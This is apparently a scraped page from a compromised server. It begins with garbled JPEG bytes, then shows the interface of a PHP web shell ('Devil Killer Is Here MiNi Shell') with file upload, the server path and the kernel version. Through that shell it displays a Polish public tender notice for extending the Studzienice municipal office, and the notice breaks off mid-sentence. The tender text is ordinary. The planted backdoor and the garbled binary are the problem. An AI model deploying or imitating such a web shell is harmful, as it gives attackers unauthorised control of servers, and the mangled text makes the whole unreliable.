JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230314/0013492901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa budynku Urzędu Gminy Studzienice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Studzienice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Studzienice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979559</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kaszubska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Studzienice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">77-143</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598216607</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia_publiczne@studzienice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.studzienice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa budynku Urzędu Gminy Studzienice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-07965ecc-c25f-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00134929</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012317/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Rozbudowa budynku Urzędu Gminy w Studzienicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-07965ecc-c25f-11ed-8261-62cbbe4d0ca4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, tj.:<br/>• przy użyciu Platformy e-Zamówienia, która jest bezpłatna i dostępna pod adresem https://ezamowienia.gov.pl.<br/>• ePUAP (Elektroniczna Skrzynka Podawcza – nazwa – Urząd Gminy Studzienice): https://epuap.gov.pl/wps/portal, Skrzynka ESP -<br/>510rl0qonl<br/>• poczty elektronicznej e-mail: zamowienia_publiczne@studzienice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10. Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem korespondencji elektronicznej (inna niż oferta<br/>Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pomocą poczty elektronicznej, email:<br/>zamowienia_publiczne@studzienice.pl.<br/>11. Zamawiający dopuszcza również komunikację za pomocą dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przez portal e-Zamowienia (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie<br/>może być szyfrowana.<br/>12. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie eZamowienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>13. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>14. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>15. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamowienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamowienia.<br/>16. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy eZamowienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Wójt Gminy Studzienice, realizujący zadania przez Urząd Gminy Studzienice z<br/>siedzibą przy ul. Kaszubskiej 9, 77-143 Studzienice,<br/>􀀀 inspektorem ochrony danych osobowych w Urzędzie Gminy Studzienice jest Pan Artur Bielicki, kontakt: artur.bielicki@cbi24.pl;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Rozbudowa budynku Urzędu Gminy Studzienice” nr RI.271.3.2023.NJ<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy;<br/>􀀀 Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji w/w postępowania z uwzględnieniem okresów<br/>przechowywania określonych w przepisach odrębnych, w tym przepisów archiwalnych;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>􀀀 przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.3.2023.NJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest nadbudowa, rozbudowa i przebudowa budynku Urzędu Gminy Studzienice<br/>współfinansowana w ramach Rządowego Funduszu POLSKI ŁAD: PROGRAM INWESTYCJI STRATEGICZNYCH.<br/>2) Teren inwestycji znajduje się na terenie województwa pomorskiego, w powiecie bytowskim, gmina Studzienice, na działce<br/>o numerze ewidencyjnym 247, 248 i 250, obręb Studzienice.<br/>3) Zakres przedmiotu zamówienia obejmuje:<br/>1. Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie nadbudowy, rozbudowy i przebudowy budynku<br/>Urzędu Gminy w Studzienicach. Szczegółowy zakres robót zawarto w dokumentacji projektowej (stanowiącymi załącznik nr<br/>12 do SWZ). Projektowana rozbudowa przewiduje wykonanie pomieszczeń biurowych stanowiących uzupełnienie funkcji<br/>istniejącego budynku.<br/>2. Projektowana rozbudowa:<br/> Wysokość budynku - 9,47m (N)<br/> Powierzchnia zabudowy pomieszczeń projektowanych: - 418,53 m2<br/> Powierzchnia wewnętrzna pomieszczeń projektowanych - 885,05 m2<br/> Kubatura netto pomieszczeń projektowanych - 2910,6 m3<br/> Kubatura brutto pomieszczeń projektowanych - 3890,4 m3<br/>3. Planowana inwestycja obejmuje:<br/>− rozbiórkę istniejącego budynku gminy (jednego z dwóch połączonych ze sobą budynków), o wysokości ok. 6,7 m,<br/>− nadbudowę pozostałej części, istniejącego budynku gminy z rozbiórką warstw wykończeniowych istniejącego stropodachu,<br/>− rozbudowę budynku gminy wraz z infrastrukturą techniczną i instalacjami,<br/>− przebudowę istniejącego budynku,<br/>− budowa miejsc postojowych dla samochodów osobowych.<br/>4) Przedmiot zamówienia:<br/>1. w zakresie istniejącego budynku:<br/>• rozbiórki i budowy nowych schodów zewnętrznych prowadzących do piwnicy istniejącego budynku z wykonaniem nowego<br/>wejścia,<br/>• rozbiórki ścian wewnętrznych,<br/>• przesunięcie ściany – zabudowy istniejącej klatki schodowej,<br/>• wykonanie nowych otworów drzwiowych,<br/>• poszerzenie istniejącego korytarza i przejścia pomiędzy istniejącym budynkiem a projektowaną rozbudową,<br/>• wykonanie pochylni w istniejącej części budynku – w celu niwelacji różnicy poziomów posadzek istniejącego budynku i<br/>projektowanej rozbudowy,<br/>• wykonanie nadbudowy z konstrukcją dachową (w nawiązaniu do konstrukcji dachowej nowego budynku) i nowym<br/>pokryciem.<br/>2. w zakresie rozbudowy:<br/>• Wykonanie robót budowlanych:<br/>o Roboty ziemne,<br/>o Roboty fundamentowe,<br/>o Roboty murowe,<br/>o Roboty izolacyjne,<br/>o Roboty konstrukcyjne w zakresie stropów, schodów wewnętrznych, szybu windowego i konstrukcji dachu,<br/>o Montaż stolarki zewnętrznej i wewnętrznej,<br/>o Pokrycie dachowe,<br/>o Roboty elewacyjne,<br/>o Roboty ślusarskie w zakresie balustrad i zadaszeń wejść,<br/>o Roboty wykończeniowe wewnętrzne.<br/>• Wykonanie robót sanitarnych:<br/>o Instalacja kanalizacji sanitarnej wraz z montażem urządzeń,<br/>o Instalacja wodociągowa wraz z armaturą,<br/>o Instalacja hydrantowa,<br/>o Instalacja centralnego ogrzewania ze źródłem ogrzewania w postaci 2 powietrznych pomp ciepła (dla ogrzewania budynku<br/>oraz na potrzeby c.w.u. pompę o mocy 45 kW oraz na potrzeby ciepła technologicznego nagrzewnicy centrali wentylacyjnej<br/>C1 pompę o mocy 12 kW.<br/>o Instalacja wentylacji mechanicznej z odzyskiem ciepła.<br/>• Wykonanie robót instalacyjnych elektrycznych i teletechnicznych<br/>o Instalacja gniazd wtykowych,<br/>o Instalacja oświetlenia podstawowego,<br/>o Instalacja oświetlenia awaryjnego i ewakuacyjnego,<br/>o Instalacja oświetlenia zewnętrznego,<br/>o Montaż rozdzielnicy głównej i rozdzielnic piętrowych,<br/>o Instalacja przeciwpożarowego wyłącznika prądu,<br/>o Instalacja odgromowa i połączeń wyrównawczych.<br/>o Instalacja oddymiania grawitacyjnego klatki schodowej,<br/>o Instalacja fotowoltaiczna 26 KWp (65 szt paneli o mocy 400 Wp oraz falownik o mocy 20 KW),<br/>o Instalacje teletechniczne: okablowania strukturalnego, SSWiN, monitoringu wewnętrznego i zewnętrznego.<br/>3. w zakresie zagospodarowania terenu<br/>• wykonanie dojść do budynku z kostki betonowej,<br/>• wykonanie parkingu dla samochodów osobowych z kostki betonowej,<br/>5) Inne elementy ujęte w dokumentacji projektowej stanowiące załącznik Nr 11 do SWZ i projekcie umowy stanowiącym<br/>załącznik Nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o poniższe kryteria:<br/>a) Cena (C) – 60 %<br/>b) Okres udzielonej gwarancji (G) – 30 %<br/>c) Skrócony termin wykonania zamówienia (T) – 10 %<br/>Punkty przyznane za kryterium: „cena” będą liczone wg następującego wzoru:<br/>C – ilość punktów = (najniższa oferowana cena brutto)/(cena brutto oferty ocenianej) x 100 x 60%<br/>Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Punkty przyznane za kryterium: „okres udzielonej gwarancji” będą liczone następująco:<br/>G – okres udzielonej gwarancji = (długość gwarancji w badanej ofercie)/(najdłuższa gwarancja wśród ocenianych ofert) x 100 x 30%<br/>Uwaga: maksymalny uwzględniany okres gwarancji wynosi 72 miesięcy; na potrzeby oceny ofert, w przypadku ofert z okresem<br/>gwarancji dłuższym niż 72 miesięcy, do ich oceny zostanie przyjęty okres 72 miesięcy gwarancji. Minimalny okres gwarancji oferty<br/>wynosi 48 miesięcy - oferty z okresem gwarancji poniżej 48 miesięcy zostaną odrzucone.<br/>Punkty przyznane za kryterium „skrócony termin wykonania zamówienia” będą liczone następująco:<br/>Termin wykonania zamówienia – do 14 miesięcy wraz z uzyskaniem pozwolenia na użytkowanie – O %<br/>Skrócony termin wykonania zamówienia – do 13 miesięcy wraz z uzyskaniem pozwolenia na użytkowanie – 5%<br/>Skrócony termin wykonania zamówienia -do 12 miesięcy wraz z uzyskaniem pozwolenia na użytkowanie – 1O%<br/>Ogólna liczba punktów zostanie obliczona wg następującego wzoru:<br/>P = C + G + T<br/>gdzie:<br/>P – ogólna liczba punktów przyznana ofercie,<br/>C – liczba punktów przyznanych danej ofercie za cenę,<br/>G – liczba punktów przyznanych danej ofercie za okres udzielonej gwarancji,<br/>T – liczba punktów przyznanych danej ofercie za skrócony termin wykonania zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielnie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące<br/>1) sytuacji ekonomicznej lub finansowej<br/>a) Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże się posiadaniem środków<br/>finansowych lub zdolności kredytowej w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem na kwotę minimum<br/>1.000.000,00 zł (słownie: milion złotych).<br/>2) zdolności technicznej lub zawodowej<br/>a) Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał należycie<br/>minimum jedną robotę budowlaną polegającą na rozbudowie, przebudowie, budowie lub remoncie obiektu kubaturowego o<br/>wartości co najmniej 2.000.000,00 zł brutto (słownie: dwóch milionów 00/00 zł).<br/>b) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania<br/>zamówienia i skierują do jego realizacji: min.<br/>1. jedną osobę pełniącą funkcję Kierownika budowy i posiadającą odpowiednie uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub równoważne oraz<br/>2. jedną osobę pełniącą funkcję Kierownika robót i posiadającą odpowiednie uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,<br/>cieplnych, gazowych i wentylacyjnych lub 